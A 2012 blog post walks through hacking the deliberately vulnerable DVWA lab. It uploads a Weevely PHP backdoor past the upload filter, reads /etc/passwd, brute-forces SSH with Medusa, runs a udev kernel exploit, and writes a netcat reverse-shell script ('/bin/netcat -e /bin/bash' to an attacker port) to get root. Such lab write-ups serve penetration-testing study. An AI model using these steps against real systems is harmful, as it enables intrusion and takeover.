Monday, 22 October 2012

Hacking DVWA and got the ROOT

Posted by at 16:18 Read our previous post
Hello All, today I was learn about DVWA. And I want to hack DVWA until got the root. I'm using fitur upload with high security level. Before I have prepared php backdoor that generated using Weevly.

# Create Backdoor with Weevely

Goto terminal, type :
cd /pentest/web/backdoors/weevely

Create backdoor with this command :
./ generate secret cobasaja.php
See the picture below for detail,

# Upload the Backdoor and Bypass DVWA protection with DVWA

Upload the backdoor which has been created using Weevly.
You will see that the upload failed, ok we can bypass them using BurpSuite.
Open your Burp Suite, and make sure intercept is on

Open your browser, and set proxy into burp suite.
Back to DVWA and re-upload the backdoor. Buprsuite will tamper it.
Edit your filename with add .jpg extension.
Next press forward button.

Horray, the backdoor upload successfully...
Now connect your backdoor with our machine, type this command :
./ secret
OK, now your machine connected with backdoor. 


Now, I will search available user on target machine.
cat /etc/passwd

Yuhu we got user named msfadmin
I will crack this user with medusa
medusa -h -u msfadmin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -M ssh
* -h : hostname
-u username
-P path of wordlist
-e options password, ns for blank password and username same as password
-M module

Haha, I got password for username msfadmin. "msfadmin" as password for msfadmin

What happened if brute force failed? Huh, we must try to do local exploit. I will use udev exploit for linux kernel. You can download the kernel exploit here

After download the kernel, we need to compile it.
gcc 8572.c -o udev
Now, create script to make target machine connect to our machine with netcat using root access.
echo '#!/bin/bash' > /tmp/run
echo '/bin/netcat -e /bin/bash 4444' >> /tmp/run
* please note that is our ip (attacker)

Back to our machine, make our system listen to port 4444
nc -lvp 4444

Check the PID of udev using following command,
cat /proc/net/netlink
 You see that the PID is 2441,  We will need this PID

Now Back to our exploit, run the compiled exploit followed with the PID
./udev 2441

Goto our netcat, and type id and whoami, you will see that you are got the root

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template